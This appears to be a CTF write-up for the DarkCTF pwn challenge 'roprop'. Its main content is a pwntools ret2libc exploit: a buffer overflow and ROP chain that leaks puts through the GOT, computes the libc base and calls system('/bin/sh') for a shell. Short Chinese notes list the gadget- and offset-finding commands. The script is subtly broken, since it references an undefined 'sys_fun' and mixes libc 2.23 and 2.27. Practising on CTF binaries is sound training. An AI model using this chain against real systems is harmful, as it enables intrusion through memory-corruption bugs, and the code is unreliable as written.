###### tags: `DarkCTF` `Pwn` # Pwn/roprop ### description - This is from the back Solar Designer times where you require rope to climb and get anything you want. - nc pwn.darkarmy.xyz 5002 - File: https://mega.nz/file/esU1QYYT#GT9gsYhfv9Lp6UwTkJkeqcQqzyaW4h2rso84r2Pl-kQ ``` from pwn import * l = ELF('/../../lib/x86_64-linux-gnu/libc-2.23.so') context.arch="amd64" context.log_level="debug" y = process("./roprop") pop_rdi = 0x400963 puts_got = 0x601018 puts_plt = 0x400660 main = 0x4008b2 p = flat("a"*88, pop_rdi, puts_got, puts_plt, main ) y.sendlineafter('s.\n',p) y.recvline() libc = u64(y.recv(6) + '\0\0') -0x6f6a0 success('libc ->%s' %hex( libc)) print '"/bin/sh" str:' ,hex( l.search('/bin/sh').next()) sysoff = 0x453a0 sys_func = libc +sysoff bin_sh = libc + 0x18ce17 ret = 0x400646 p = flat( 'a'*88, pop_rdi, bin_sh, sys_fun ) y.sendlineafter('\n',p) y.interactive() ``` ### rop思路 - 找rdi - ROPgadget --binary ./rop --only "pop|ret" - 找可用plt(puts、main) - objdump -d ./rop - 找可用got(puts) - objdump -R ./rop - 接收吐出記憶體位置 - libc = u64(y.recv(6) + '\0\0' - 引用之got offset) - 找libc puts offset - readelf -s /lib/x86_64-linux-gnu/libc-2.27.so | grep 'puts' - objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep 'system' - 找/bin/sh - print '"/bin/sh" str:' ,hex( l.search('/bin/sh').next()) - 找libc system offset - readelf -s /lib/x86_64-linux-gnu/libc-2.27.so | grep 'system'